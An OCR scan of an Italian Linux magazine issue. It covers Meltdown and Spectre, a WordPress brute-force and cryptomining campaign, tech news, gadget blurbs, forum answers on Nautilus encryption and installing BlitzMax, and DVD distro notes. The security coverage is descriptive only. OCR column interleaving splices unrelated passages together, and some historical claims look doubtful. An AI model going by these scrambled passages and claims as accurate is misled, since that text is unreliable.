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Intel e AMD, bucati così... 


Richard Stallman ha rivoluzionato il 
mondo del Software Libero. Linus Tor- 
valds, ha creato il primo vero sistema 
operativo alternativo a Windows. E, a 
dirla tutta e senza nascondersi dietro 
un dito, anche Microsoft ha dato una 
bella botta all'informatica, rendendola 
alla portata di tutti, nella maniera giusta 
o sbagliata che sia. Intel e AMD hanno 
reso l'acquisto dell'hardware (e più in 
particolare delle CPU) estremamente 
popolare: non più di 20 anni fa un “ela- 
boratore” non era proprio alla portata di 
tutti. Insomma, chi più chi meno, questi 
e altri nomi sono destinati a restare per 
sempre impressi nei libri di storia. Ma 
un altro nome, forse sconosciuto ai più, 
è destinato ad aggiungersi: Jann Horn. 
Chi è? Ha inventato qualche nuovo 
sistema operativo Libero, sviluppato 
una rivoluzionaria applicazione o per 
caso ha brevettato un nuovo concetto 
di computer? Nulla di tutto ciò. 

AI ventitreenne tedesco, membro del 
Project Zero targato Google, va il merito 
di aver scoperto forse la più grande falla 
informatica dell'ultimo secolo. Una falla 
che risiede proprio nei microprocessori 
sviluppati da Intel e AMD e oggi meglio 
nota sottoforma di due nomi al centro 
dell'attenzione anche dei media non 
specializzati: Meltdown e Spectre. 

E come spesso accade per i veri rivo- 
luzionari informatici, tutto è successo 
per caso. Horn crea un codice ma, non 
sapendo se questo sia perfettamente 
gestibile dall'hardware di un'odierna 
CPU, incomincia a spulciare per bene la 
documentazione Intel per capirne di più 
(non che non ne sappia già abbastanza, 
eh!). Proprio partendo dalla base; si 
rende conto che, al fine di velocizzare 
le operazioni, nel caso di calcoli errati, 
questi rimangono comunque memoriz- 
zati nel microprocessore. Senza scen- 
dere troppo nei tecnicismi, questi dati 
sono lì, alla mercé di un hacker di turno. 
Ed è così che Horn decide di informare 
i più grandi produttori di CPU al mondo 
(Intel, AMD e ARM) di questa gravissi- 
ma vulnerabilità. Tutto ciò nel mese di. 


” 


giugno 2017. Oggi, agli albori di questo 
2018, Meltdown e Spectre sono sulla 
bocca di tutti: esperti, professionisti IT 
e persino utenti comuni. È pur sempre 
la più grande falla mai verificatasi nella. 
storia dell'informatica. Ma un attimo; 
noi usiamo GNU/Linux, dunque siamo 
al sicuro? Assolutamente no. Perché il 
bug è hardware, quindi assolutamente 
indipendente dal tipo di sistema ope- 
rativo utilizzato, che sia esso mobile 0 
desktop, Libero o proprietario. Tuttavia, | 
senza lanciare inutili allarmismi, il Pin- 
guino ha già provveduto a indossare la 
sua corazza: un nuovo aggiornamento 
del kernel Linux mette una pezza ai due 
bug che invece continuano a minaccia- 
re la sicurezza di milioni di smartphone, 
tablet, Smart TV, PC e server con siste- 
mi operativi non aggiornati o comunque 
sviluppati da produttori che non sono 
stati ad oggi in grado di correggere via 
software la problematica (che, lo ricor- . 
diamo, è hardware). Dunque, una patch 
e via. Detta così sembrerebbe semplice, 
ma non lo è affatto. Già, perché se è 
vero il bug deriva da una mal gestione 
dei calcoli delle CPU che permette di 
velocizzare le operazioni, non è difficile 
intuire che mettendoci una pezza gli 
stessi processori non fanno altro che 
offrire delle prestazioni leggermente mi- 
nori. Si parla di pochi punti percentuale, 
forse del tutto trascurabili per un utente 
che si limita ad accendere il PC per 
navigare o al più per avviare semplici 
software. Anche per chi ne fa un uso 
più professionale, ad esempio grafici 
multimediali o sviluppatori, questo calo 
prestazionale potrebbe non essere una 
tragedia, passando addirittura del tutto 
inosservato. Ma i veri dolori iniziano 

in ambito server: su grosse macchine 
che gestiscono immensi siti Web, ad 
esempio, questa perdita di performance 
potrebbe farsi sentire. Le “scuse” di 
Intel e AMD possono bastare? 


Vincenzo Cosentino 
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WordPress: hacker all’attacco! 


Il CMS è ancora una volta al centro di una massiccia campagna malevola 


BI Una nuova campagna ma- 
levola prende di mira i siti 
WordPress, la cui popolarità 
fa sempre più gola ai cyber- 
criminali. Si parla di un attacco 
di grandi dimensioni, un'opera- 
zione volta a compromettere in 
massai siti WordPress per “ar- 
ruolarli” nell'attacco o sfrut- 
tare i server sottostanti per il 
mining di criptovaluta Mone- 


zione di liste di password co- 
muni ed “euristica basata sul 
nome di dominio e i contenuti 
del sito attaccato”, dicono da 
Wordfence, con l'obiettivo di 
“indovinare” le credenziali di 
accesso dell'account ammi- 
nistratore del sito. Una volta 
raggiunto l'obiettivo, l'attacco 
prevede l'installazione di uno 
script per il mining Monero - 


cking - oppure, in alternativa, 
l'infezione del sito e l'arruola- 
mento forzato come bot nella 
campagna malevola. Stando 
alle analisi, i cyber-criminali 
avrebbero già guadagnato 
un numero di Monero equi- 
valenti a $100.000. L'attacco 
conferma, qualora ce ne fosse 
bisogno, come la popolarità 
di un CMS come WordPress 


ro. Individuato da Wordfence, in pieno stile 


l'attacco viene descritto come 
aggressivo con un picco di 14 
milioni di tentativi di accesso 
all'ora. La rete malevola usa- 
ta dai criminali comprende 
10.000 indirizzi IP unici, tutti 
focalizzati nell'attaccare 
190.000 siti WordPress 

ogni ora. | cyber- 
criminali fanno uso 

di una combina- 


cryptoja- faccia davvero gola ai cyber- 
criminali: è recente la notizia 
dell'installazione “nascosta” 
di una backdoor all'interno di 
un plug-in molto popolare e 
anche i database in standard 
MySQL sono un obiettivo 
frequente degli hacker 

black hat. 
Per informazioni: 
www.edmaster.it/ 
url/7321 


Google Assistant anche sui vecchi Android 


L'assistente personale arriva anche sui tablet e sui device meno recenti 


Gli utenti dei vecchi terminali Android non per- 
dano la speranza: Google Assistant è in dirittura di 
arrivo peri dispositivi ancora basati su Android 5.0 
Lollipop. Mountain View estende sensibilmente la 
quota di utenza servita dal suo assistente digitale, 
a ennesima riconferma della frammentazione del 
mercato dei dispositivi Android. Grazie alla nuova 
mossa di Google, più della metà dei device basati 
sull'OS mobile più popolare potranno presto fare 
domande e ricevere risposte in linguaggio collo- 
quiale alla IA di Assistant, aggiungendo Lollipop 
alle versioni fin qui supportate dalla tecnologia 
{da 6.0 Marshmallow in poi). L'aggiornamento che 
abilita Assistant arriverà prima di tutto sui termi- 
nali in lingua inglese in USA, UK, Australia, Cana- 
da, India e Singapore, oltre a raggiungere mercati 
come Italia, Germania, Giappone, Corea del Sud, 
Messico, Brasile e Spagna. Una novità assoluta 
rappresenta invece il debutto di Assistant sui ta- 
blet Android, form factor fin qui escluso dall'assi- 
stente digitale e che ora implementerà la “nuova” 
funzionalità a partire dalla release 6.0 di Android. 


L'arrivo di Assistant sui terminali di vecchia ge- 
nerazione rappresenta quasi un controsenso 
per una corporation costantemente proiettata in 
avanti, ma è anche la constatazione del fatto che 
Android continua a essere un mercato frammen- 
tato parecchio complicato da gestire: a fine 2017, 
Android 6.0 risultava essere la versione più usata 
dell’OS (30%), mentre il 6,1% dell'utenza usava an- 
cora Android 5.0 e il 20,2% la release 5.1. 


Per informazioni: 
www,edmaster.it/url/7322 


Il nuovo algoritmo ripara-immagini 


Un team di ricercatori russo ha scoperto il metodo per “ricostruire” le immagini 


ni Deep Image Prior (DIP) è un nuovo algo- 
ritmo di ricostruzione e riparazione delle im- 
magini in formato digitale, una tecnologia a 
base di reti neurali ideata da ricercatori russi 
che, diversamente dal solito, non necessita di 
un esteso periodo di 
“addestramento” per 
funzionare nel miglio- 
re dei modi. Se gli al- 
goritmi “intelligenti” 
per il processing delle 
immagini tendono tra- 
dizionalmente ad agi- 
re con efficacia solo 
dopo aver analizzato 
un database di dati 
pre-esistente di note- 
voli dimensioni, infatti, DIP si limita a lavorare 
partendo esclusivamente dalle informazioni 
contenute nell'immagine da modificare. No- 
nostante questo limite apparente, il nuovo al- 
goritmo offre capacità notevoli come la rimo- 


zione del rumore o del testo dalle immagini, il 
riempimento delle sezioni tagliate o cancella- 
te, la rimozione degli effetti di pixelation do- 
vuti alla compressione “lossy” degli algoritmi 
JPEG, l'incremento della risoluzione e quali- 
tà di un'immagine a 
bassa risoluzione. DIP 
rappresenta in ogni 
caso il risultato di una 
ricerca che ha prodot- 
to risultati notevoli sul 
fronte degli algoritmi a 
reti neurali progettati 
per lavorare con le im- 
magini. Risultati che 
includono tecnologie 
capaci di ricostruire 
foto incomplete o pixellate (PixelNN], o di ese- 
guire l’upscaling di alta qualità di foto in bassa 
risoluzione (EnhanceNet-PAT]. 
Per informazioni: 
www.edmaster.it/url/7323 


Tripwire scova le falle dei siti Web 


Un nuovo tool Open permette di individuare l'eventuale compromissione di un sito 


MI Si chiama Tripwire ed è in 
grado di scovare automatica- 
mente le brecce nei siti Web in 
anticipo. Il tool, il cui codice è 
Open Source, ha già individuato 
casi di insicurezza potenzial- 
mente molto gravi. Tripwire è 
un ‘crawler di registrazioni”, 
spiegano. i suoi creatori, vale a 
dire un software capace di re- 
gistrare uno 0 più account su 
diversi siti Web usando e-mail 
univoche ma riciclando la stessa 
password. A intervalli regolari, 
Tripwire controlla se qualcuno 
ha provato a usare la password 
per accedere a un account, se- 
gno evidente del fatto che il sito 
in oggetto ha subito un attacco 
e il database degli utenti è stato 
in qualche modo compromesso. 
L'efficacia di Tripwire è già stata 
testata su più di 2.300 siti diffe- 


renti e in 19 casi sono stati evi- 
denziati accessi non autorizzati. 
Un sito in particolare vanta una 
base di 45 milioni di utenti, tut- 
ti evidentemente a rischio. Gli 
esperti hanno contattato gli am- 
ministratori: dei siti violati ma 
hanno deciso di non divulgare 
pubblicamente la loro identità: 
l'onere della comunicazione al 
pubblico è stato lasciato ai sin- 
goli responsabili e in tutti i casi 
questi ultimi-hanno deciso di te- 


nere:la bocca chiusa coi propri 
utenti. Tripwire è dotato anche 
di funzionalità aggiuntive come 
la capacità di identificare i Siti 
che archiviano le password te- 
stualiin chiaro.o con algoritmi di 
hashing vulnerabili, mentre per 
meglio illustrare i risultati del 
loro lavoro .i ricercatori hanno 
pubblicato on-line uno studio. 


Per informazioni: 
www.edmaster.it/url/7324 
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Gadget hi-tech per tutti 


Periferiche, accessori e altri dispositivi per lavorare e divertirsi nel tempo libero 


Se siamo alla ricerca di un 
NAS performante e che ci 
permetta anche di condi- 
videre filmati in 4K sulla 
nostra Smart TV, questo 

è il modello che fa per 
noi. Grazie alla transcodi- 
fica diretta (con il codec 
H.265), è infatti perfetto 
per effettuare streaming 
nella rete locale. Il proces- 
sore è un quad-core da 
1,4 GHz e il quantitativo 

di memoria RAM è pari a 
1 GB (DDR4). Gli allog- 
giamenti per i dischi (non 
forniti) sono 2. 


Vogliamo navigare con il notebook anche quando siamo in 
viaggio o comunque lontani da casa? Possiamo pur sempre 
utilizzare le funzionalità di tethering del nostro smartphone 
Android. Ma se vogliamo navigare alla massima velocità e 
condividere la connessione con più dispositivi, ci occorre un 
buon router portatile 4G. Dallo schermo touchscreen di questo 
modello, possiamo settare il router secondo le nostre preferen- 
ze, controllare la velocità di navigazione e i dispositivi connessi. 


NETGEAR 


Ei operai ts *f 100% BUR 


NTGR-90BC 95490563 
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WiFi Messages Settings 4 


La nostra TV non è Smart o il suo software non ci soddisfa? Niente 
paura, non è necessario acquistarne un nuovo modello, ma più sem- 
plicemente possiamo collegare un TV Box equipaggiato con Android 
proprio come il Bgeel AX9 Max che permette anche la riproduzione di 
contenuti in 4K. AI suo interno batte il cuore di un ARM Cortex TM-A53 
a 64 bit, mentre la release di Android che troviamo già installata è la 
7.1. La connettività a Internet è garantita dall'adattatore Wi-Fi integrato. 


Quante volte ci è capitato di dover collegare una micro SD al 
PC, ma l'adattatore sembrava essere sparito nel nulla? E anco- 
ra, di voler collegare una pendrive allo smartphone? Da oggi, 
grazie a quest'adattatore tutto fare non'avremo più problemi. 
Consente di collegare qualsiasi dispositivo di memorizzazione 
(schede SD, micro SD, T-Flash) ad un notebook o telefonino 
Android equipaggiato di un ingresso USB (anche il nuovo C) o 
Micro USB. 
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Gus da g e e 


(Nt 


È VIAGGIA TRANQUILLO! 


Siamo pronti per un nuovo viaggio? Ma siamo davvero 
certi di poter utilizzare il caricabatterie del nostro tele- 
fonino o l'adattatore di rete del nostro notebook? Non 
tutti i Paesi hanno la stessa presa elettrica. Ma grazie a 
quest'adattatore da tenere sempre in valigia non avremo 
problemi! Oltre a 2 porte USB, ci permette di collegare i 
nostri dispositivi alla rete elettrica del Regno Unito, degli 
USA, dell'Australia e, ovviamente, anche dell'Europa. 
Per informazioni: www.edmaster.it/url/7332 
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VELOCE E CAPIENTE 
LEXAR PROFESSIONAL 1000X SCHEDA MICROSDXC 64 GB 


Le action cam più evolute (come la GoPro Hero 6) necessitano di 
schede micro SD super veloci e, complici anche le alte risoluzioni 
disponibili, anche capienti. Questo modello prodotto da Lexar offre 
tutto ciò che ci occorre per non avere problemi di memoria (ben 64 
GB) e di velocità (in lettura fino a 150 MB/s). In dotazione viene fornito 
un adattatore USB. 

Per informazioni: www.edmaster.it/url/7329 
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LA STAMPANTE DA TASCHINO 


Una stampante fotografica portatile è quanto ci sia di meglio per 
stampare al volo uno scatto realizzato con la fotocamera del nostro 
smartphone. La tecnologia di stampa termica Zink offre un'elevata 
qualità e permette di stampare senza bordi. Il trasferimento dei file da 
stampare avviene tramite Bluetooth 3.0. 
Per informazioni: 
www.edmaster.it/url/7331 


NO PASSWORD, NO PARTY! 


Di pendrive USB ce ne sono a bizzeffe: di tutte le 
capienze; di tutte le velocità e di tutti i design. Ma 
questo modello di Kingston si distingue per la pre- 

‘. senza di un tastierino numerico che protegge con una 
password l'accesso ai dati memorizzati al suo interno. 
La capacità di 64 GB, più che sufficiente per ospitare 
tonnellate di file! 
i Per informazioni: www.edmaster.it/url/7330 


CRI BASSE IA ASSAI IERI ARIA 


i. DAL FORUM LINUX-MAGAZINE.EDMASTER.IT 


SOLUZIONI DAL FORUM 


Ogni mese i thread più gettonati estratti nelle diverse discussioni dal forum di GNU/Linux 
Magazine. Se non fai ancora parte della nostra squadra, iscriviti-subito e contribuisci alla 
crescita del movimento Open Source. Il nostro sito è pronto ad ospitare esperti, neofiti 0 

semplicemente chi ne vuole sapere di più a proposito di GNU/Linux e del Software Libero 


Sistema/Sicurezza 


MANGA LA VOCE “CIFRA...” 


DOMANDA: Dal menu contestuale di Nautilus, il file manager 
dell'ambiente desktop del “piedone” (Gnome), cliccando su un 
file e/o una cartella con il tasto destro del mouse, appariva tra 
le voci la dicitura Cifra... che non riesco più ad avere. È una 
funzione che è stata rimossa oppure manca qualche pacchetto? 


SOLUZIONE: La domanda è stata posta dall’utente Brizio 
e sarà lui stesso da li a qualche ora a riportare la soluzione 
consistente nella mancanza dell’estensione specifica per 
Nautilus che permette la cifratura e decifratura dei file. Ad 
esempio in una OpenSUSE è il pacchetto nautilus-extension- 
seahorse (https://wiki.gnome.org/Apps/Seahorse/Plugins) che 
può essere installato tramite il gestore dei pacchetti. Solo a 
questo punto l’utente ha visto nuovamente la voce Cifra... (0 
Encrypt) apparire dal menù contestuale (Fig. 1). Aggiungiamo 
che l’estensione riportata ha l’omonimo programma in Seahorse 
(htips://wiki.gnome.org/Apps/Seahorse), ovvero l’interfaccia 
grafica per ambiente desktop Gnome per la gestione di chiave 
cifrate PGP (Pretty Good Privacy — www.openpgp.org) e SSH 
(Secure SHell — www.openssh.com). 
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Fig. 1 » Nautilus con la funzione “sparita” 
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INSTALLARE BLITZMAX 


DOMANDA: Ciao a tutti, sono nuovissimo su GNU/Linux. 
Sicuramente sto per fare una domanda che molti di voi hanno 
sentito migliaia di volte, ma dovete perdonarmi, ho fatto 
un po’ di ricerche e tentativi senza esito quindi eccomi qui. 
Ho la necessità di installare il programma BlitzMax e ho 
scaricato il file compresso BlitzMax150_linuxx86.tar.gz che 
decomprimo tranquillamente nella home utente ma che non 
posso decomprimere in nessun'altra cartella perché non ho i 
privilegi. Allora la domanda è: come devo fare per installare 
questo programma e vederlo finalmente funzionare? 


SOLUZIONE: La domanda è formulata dall’utente polgames. L’utente 
Krisi riporta l’eventuale procedimento qualora all’interno dell’archivio 
compresso fossero presenti i sorgenti, procedura che vede la seguente 
dinamica e che riportiamo come promemoria per i nuovi arrivati. 
Laddove siano presenti i sorgenti e la sviluppo del programma è stato 
organizzato utilizzando gli autotools, anche noti con il nome di GNU 
Build System, costituiti da un insieme di strumenti di sviluppo software 
che vede almeno autoconf, automake e libtool presenti nei repository 
di tutte le distribuzioni, allora in questo caso tutto quello che occorre 
fare, al di là del soddisfacimento delle dipendenze necessarie indicate 
in genere in ogni pacchetto sorgente e/o nel sito dello sviluppatore, è 
decomprimere l’archivio compresso e seguire la sequenza di comandi che 
segue impartiti nella cartella creata dalla decompressione dei sorgenti: ./ 
configure --help, per vedere le opzioni che è possibile passare nella fase 
di configurazione e quindi ./configure (con eventuali opzioni aggiuntive 
riportate nel comando precedente) per creare il file make dal quale poi il 
compilatore prenderà le dovute direttive per la compilazione dei sorgenti 
(ad esempio, in caso di linguaggio C/C++). In questa fase verranno 
controllate anche le dipendenze obbligatorie necessarie al programma e in 
caso di loro assenza verrà restituito un errore che possiamo superare solo 
installando la dipendenza richiesta aiutandosi con il gestore dei pacchetti 
della distribuzione in uso. Farà seguito il comando make che utilizzerà 
l’omonimo file per effettuare la compilazione dei sorgenti che presenta 
durata variabile: da pochi secondi per programmi semplici fino a diverse 
ora per programmi complessi, come il kernel Linux o la suite d’ufficio 
LibreOffice. Terminata la fase di compilazione senza alcun errore 
effettuiamo il login da utente amministratore (o utilizziamo il comando 
sudo) quindi diamo il comando make install che installerà il programma 
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MaxIDE - /home/micha/Scaricati/BlitzMax/samples/breakout/breakout.bmx 


Program. Help 


E Help 
Index 
E Projects 
E] Samples 
E) Modules Source 


Language: |English (English) [Embedded] 


Options | Editor| Tools | 


@Show Toolbar 

©@)Open Files at Startup 

@Auto Capitalize 

@Syntax Highlighting 

@eEnable .bmx Bracket Matching 
©aAuto Backup 

WaAuto Indent 

OHide Output When Process Completes 
OUse External Help Browser 
O)Use OS Specific Shortcut Keys 
MsSort Nodes in Code View 


VA 
i, dy#,spd#,rot#=0 


E BlitzMax Source 
Add Project 


Cosa) 


iual 


idate() 
| endd 


Fig. 2 © L'ambiente di sviluppo MaxIDE presente nel pacchetto BlitzMax 


nel percorso di default ovvero, se non diversamente specificato durante 
la fase di configurazione, in /usr/local/*. A questo punto poiché la 
variabile d’ambiente contiene il tipico percorso di installazione di default 
(verificarlo con echo $PATH), nel qual caso dovremo aggiungerlo, 
scrivendo in un terminale il nome dell’eseguibile del programma appena 
installato lo potremo lanciare. Verificato il corretto funzionamento si può 
creare un lanciatore sul desktop e/o nel menu principale. Se tra i “novizi” 
c’è qualcuno che vorrà provare a costruire un programma (si inizi sempre 
da quelli più semplici!) da sorgenti e trovasse difficoltà può sempre 
riportare il problema riscontrato nel forum di Linux Magazine. Questa 
procedura, però, non era necessaria all’utente polgames e vediamo di 
capirne il motivo. Prima di tutto cos’è BlitzMax? È un compilatore 
per il linguaggio Blitz BASIC che fece la prima apparizione nel 2000 
e orientato alla programmazione di videogiochi in 2D prima e 3D in 
seguito con l’aggiunta del modulo Blitz3D. Inizialmente i componenti 
costituenti il necessario per sviluppare in Blitz BASIC erano rilasciati 
tutti con licenza proprietaria, ma con il passare del tempo, prima il 
compilatore BlitzMax nel 2005 e solo nel 2014 per Blitz3D, sono stati 
rilasciati con licenza Open Source e sorgenti scaricabili direttamente via 
Github (Atips://github.com/blitz-research). A breve faremo riferimento 
al pacchetto indicato dall’utente che ha formulato la richiesta, ma 
facciamo presente che altri pacchetti sono disponibili per piattaforme a 
64 bit così come per la Raspberry Pi. Fare sempre riferimento al sito dello 
sviluppatore anche nel rilascio di nuove versioni (www.graphio.net). 

Dopo questa serie di precisazioni veniamo alle domande formulate 
dall’utente. La prima è che non si può “liberamente” decomprimere 
il pacchetto dove si vuole poiché occorre rispettare la struttura e le 


funzioni delle cartelle codificate nei documenti LSB (Linux Standard 
Base - htips://wiki.linuxfoundation.org/Isb/starî) e FHS (Filesystem 
Hierarchy Standard). Premesso ciò, in alcuni casi vengono forniti dei 
pacchetti precompilati per il software che si vuole utilizzare e BlitzMax 
è il tipico caso. Puntiamo il browser all’indirizzo https://nitrologic. 
itch.io/blitzmax e scarichiamo il pacchetto BlitzMax150_linuxx86. 
targz quindi procediamo alla sua decompressione. Prima di lanciare 
l’IDE (Integrated Development Environment) integrato presente nel 
pacchetto assicuriamoci che siano installate le librerie a 32 bit libXft2 e 
libxpm4 infatti l’IDE e il compilatore funzionano solo su piattaforme a 
32 bit o a 64 bit ma con i pacchetti a 32 necessari al suo funzionamento. 
A questo punto lanciando l’eseguibile MaxIDE verrà aperto l’omonimo 
ambiente di sviluppo (Fig. 2) il quale presenta diversi esempi da compilare 
e lanciare. Durante la fase di compilazione degli esempi verrà aperto un 
tab di debug nel quale verranno elencati le dipendenze necessarie (a 32 
bit) che dovremo installare al fine di portare a termine la compilazione 
dell'esempio che si vuole provare. Per gli interessati che vogliono 
divincolarsi dai soliti motori di gioco possono analizzare le potenzialità 
del motore 3D di Blitz BASIC nonché i vari video di giochi in sviluppo 
e/o proof of concept (dimostrazioni) di varie applicazioni. Non solo, 
ma se dopo aver visionato i video e provato qualche esempio qualcuno 
si volesse cimentare nella programmazione in Blitz BASIC al fine di 
realizzare un proprio progetto, si potrebbe pensare all’acquisto del libro (in 
Inglese) BlitzMax for Absolute Beginners: Games Programming for 
the Absolute Beginner per il quale all’indirizzo www.blitzmaxbook.com 
è possibile scaricare il completo codice sorgente degli esempi riportati, in 
modo da approfondire l'argomento.’ 
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TAILS 3.4 


iù 


Se documenti riservati sul disco rigido o, peggio ancora, 
su un qualsiasi servizio di cloud storage non è per nulla sicu- 
ro: un pirata potrebbe impossessarsi più o meno facilmente dei 
nostri dati più importanti. Proprio per questo motivo, negli ultimi 
anni, TAILS è diventata una delle distribuzioni più apprezzate 
dagli utenti. Perfetta da portare sempre nel taschino (creando una 
pendrive avviabile) è la soluzione ideale per editare documenti 
o navigare senza lasciare tracce. In questa nuova release 3.4, gli 
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Tails 3.0 is out 


ESTCAGUEX 


Magazine 


sviluppatori hanno provveduto ad aggiornare il kernel Linux 
alla versione 4.14.12 che mette una pezza ai bug Meltdown e 
Spectre (per maggiori informazioni sulle due falle possiamo dare 
un'occhiata a pag. 14). Rispetto alla versione precedente, è stato 
corretto anche un problema che causava un avvio della distro 
decisamente lento, specialmente quando la si avviava da un DVD. 
Con l'occasione, il team di TAILS ha anche provveduto ad aggior- 
nare un po' dei software integrati nella distro. 


Le distribuzioni principali presenti all'interno del DVD-Rom sono direttamente avviabili dal supporto digitale, quindi installabili o 
eseguibili in modalità LIVE. Basta inserire il DVD-Rom nell'apposito lettore e riavviare il PC. Dopo pochi secondi apparirà l'inter- 
faccia per l'avvio della distribuzione o per la sua esecuzione in modalità LIVE. Per tutte le altre basta seguire le seguenti istruzioni, 


L'INTERFACCIA 


Per le distribuzioni disponibili sotto forma di immagini ISO, apriamo il 
DVD-Rom conil file manager e clicchiamo due vole sul file index.htm. 
A questo punto, dovrebbe apparire l'interfaccia di gestione. Clicchiamo 
sull'illustrazione o sulla voce Distribuzioni presente nel menu a destra. 
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fier/f/mediafbackup/Distribuzionifdvd:10-149d/distribuzioni/ mea 


Indice di /media/backup/Distribuzioni/dyd-10-149-b/distribuzioni/ 
Dimensioni Data ultima modifica 


2008/13 12:29:57 
20/08/13 12-30-01 


DOWNLOAD ISO 


Da qui, possiamo scaricare l'immagine ISO della distribuzione semplicemente 
accedendo alla sua eventuale cartella e premendo sul relativo link. Dopodiché, 
possiamo masterizzare l'ISO su Cd-Rom e DVD-Rom per creare il supporto di 
installazione o trasferirla su una pendrive USB bootable. 
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MANJARO 17.1.0 


AT n 
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SÌ stabilità, velocità e La sono 5a. variabili fondamen- 
tali nella scelta di una nuova distro, non possiamo non ritenere 
Manjaro una delle soluzioni migliori in circolazione. Le qualità 
di cui abbiamo appena parlato sono tutte ereditate da Arch Linux 
(nella quale mette le sue radici), distro ben nota ai veri esperti di 
GNU/Linux. Ma a differenza di quest’ultima, Manjaro è davvero 
semplice da utilizzare: è pensata per i “comuni mortali” e non per i 
grandi esperti del Pinguino. Cosa c'è di nuovo in Manjaro 17.1,0? Gli 
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Progetto Modifica. Strumenti: Aiuto 


ij Creare un nuovo progetto: Progetti recenti: 


Progetto audio {m-138.iso 
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—» Copia disco 
Crea una copia 1:1 di un CD/DVD 


Ta. Masterizza immagine 
| Masterizza un'immagine CD/DVD esistente su disco 


MASTERIZZAZIONE SUPPORTI 

In ambiente Gnome possiamo utilizzare Brasero, su KDE K3b. Nel primo 
caso, avviamo il software, clicchiamo su Masterizza immagine e selezio- 
niamo l'ISO da masterizzare. Con K3b, invece, clicchiamo su Strumenti/ 
Masterizza immagine ISO e selezioniamo l'immagine ISO. 


di 


sviluppatori hanno rinfrescato gran parte dei software disponibili 
out-of-the-box. GIMP, ad esempio, si mostra nella sua ultima release 
disponibile, così come Mozilla Firefox, il browser predefinito, e Wine, 
decisamente utile nel caso in cui sia necessario avviare software 
disponibile unicamente per Microsoft Windows (come programmi 
gestionali, considerato che Manjaro trova largo spazio soprattutto 
all'interno di uffici e istituzioni). In definitiva, si tratta di una release 
assolutamente da non lasciarsi sfuggire! 
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[== Select Distribution == “| == Select Version[iit 
Benvenuti in UNetbootin, il Netboot Installer universale. Uso: © 
1. Selezionare dalla lista qui sopra una distribuzione ed una version 


specificare manualmente i file da caricare qui sotto. 
2. Selezionare un tipo di installazione e fare clic su OK per iniziarla. 


© Diskimage. JISO 
€ Custom | Keel 
Options: 


T Show All Drives (Use with Care) 


Type: use USB “] Drive: [RR O - [Renee al NI 


‘PENDRIVE USB AVVIABILE 


installiamo UNetbootin (/tip:/unetbootin.sourceforge.nef). Colleghia- 
mo la pendrive USB al PC, selezioniamo Diskimage e premiamo su‘ 
per trovare l'ISO. A questo punto, clicchiamo su OK e aspettiamo che la 


‘procedura termini. Subito dopo avviamo il PC da periferica USB. 
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CPU, il grande fail 


Meltdown e Spectre sono i due bug che mettono in ginocchio 
le CPU Intel e AMD: come funzionano e come possono essere 
sfruttati dai pirati? Scopriamolo subito! 


Luca Tringali 


La patch per blindare la tua distro la trovi su: www.edmaster.it/url/7316 


| n informatica, quando qualcosa non funziona nel migliore 

dei modi, èquasi immediato pensare a qualche errore nel 

software. Siamotalmente abituati a cercare aggiornamenti M E LTD OWN E S P ECTR E 

e patch che ci dimentichiamo che sotto ad un qualsiasi 12 bug colpiscono i sistemi ad architettura x86, cioè la quasi totalità 
programma c’è dell’hardware che potrebbe essere fallato. dei processori dell'ultimo decennio. La falla è stata scoperta nelle 
Ma non è sempre stato così: anzi, inizialmente era quasi CPU di Intel, le più diffuse, ma è stata identificata anche nei prodotti 
scontato che i bug fossero nell’hardware. Il nome stesso di AMD, nei chip ARMe in alcuni modelli di Nvidia. Ci sono però 
deriva da un tipico malfunzionamento dei primi calcolatori. delle precisazioni da fare. Praticamente qualsiasi CPU prodotta 
Erano gli anni ‘40 e i computer venivano costruiti come da Intel dopo il 1995, secondo gli esperti di Google, è vulnerabile 
degli enormi armadi, con una quantità impressionante di a Meltdown e Spectre. Le CPU di AMD sono vulnerabili soltanto a 
parti meccaniche e elettromeccaniche: bisognerà aspettare Spectre e in linea di massima lo sono tutti processori montati su 

il 1956 affinché ENIAC, il primo computer digitale noto al tablet e smartphone. Queste vulnerabilità dipendono dal processo- 
pubblico (ce ne furono altri in precedenza, ma coperti da re e dal modo in cui esegue il codice e gestisce la memoria, quindi 
segreto militare) venga considerato completo. Nel 1947 la prescindono completamente i vari sistemi operativi: non importa 
tenente Grace Hopper stava lavorando al computer Harvard il sistema operativo utilizzato: tutti i dispositivi sono vulnerabili 
Mark Il, quando l’elaborazione si bloccò. All'epoca; per perché tutti hanno un processore. Va detto, comunque, che per la 
individuare il problema era necessario armarsi di un paio di loro struttura i dispositivi mobili risultano tanto difficili da attac- 
cacciaviti, una buona lampada e dare un’occhiata all’interno care tramite questi bug che non è ritenuto credibile che possano 
dell’enorme armadio. Era un’avventura. Una persona precisa davvero essere in pericolo. Almeno, al momento in cui scriviamo: 
come la tenente Hopper segnava le varie attività di indagine soprattutto su Spectre bisogna ancora indagare per comprendere 
degli errori del computer su un apposito diario. Secondo i l'effettiva portata del problema. 
suoi appunti, alle quindici e tre quarti del 9 settembre 1947 
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CHI PUÒ USARE MELTDOWN E SPECTRE? 


Quando parliamo di bug relativi alla 
sicurezza, la cosa più importante da 
chiedersi è in quali scenari potrebbero 
essere utilizzati da qualche malin- 
tenzionato per rubarci delle informa- 
zioni private. | due bug del momento 
offrono potenzialmente ai pirati le 
nostre password e altri dati, ma sono 
molto scomodi perché offrono dump 
della memoria e probabilmente non 
verranno mai usati da malintenzionati 
comuni. In poche parole, ciò che un 
pirata può ottenere è una sequenza 


vengono memorizzate in quel posto. 
Però la RAM è abbastanza “caotica”, 
quindi recuperare le informazioni 
sarebbe davvero complicato. È un po’ 
come se scrivessimo i nostri segreti 
su dei fogli e li tagliassimo in piccoli 
pezzi una riga alla volta, mescolan- 


. doli fra loro, Un malintenzionato 


potrebbe recuperare i foglietti, ma ci 
metterebbe comunque un bel po' per 
leggerli tutti e trovare l'ordine giusto 
delle varie righe. Soprattutto se i 

testi pesano alcuni GB e sono mesco- 


programmi vari), perché l'estrazione 
delle password si dovrebbe comunque 
fare a mano o con minima automazio- 
ne. Quindi un pirata qualsiasi non li 
userebbe, soprattutto non su persone 
che nemmeno conosce. Sarebbe come 
cercare un ago in un pagliaio grande 
ettari senza neppure sapere se l'ago 
esiste realmente. Tuttavia, agenzie 

di spionaggio come NSA o CIA, con 
budget di milioni di dollari, potrebbero 
usarli per sorvegliare specifici citta- 
dini: se la sorveglianza governativa ci 


di byte dalla nostra memoria RAM, 
quindi tutte le informazioni che 


era riuscita a trovare il problema: una falena (in inglese 
“bug”) si era incastrata dentro un relay e non permetteva 
alla testina di muoversi. Quel computer elettromeccanico 
usava, infatti, proprio i relay per implementare la logica: con 
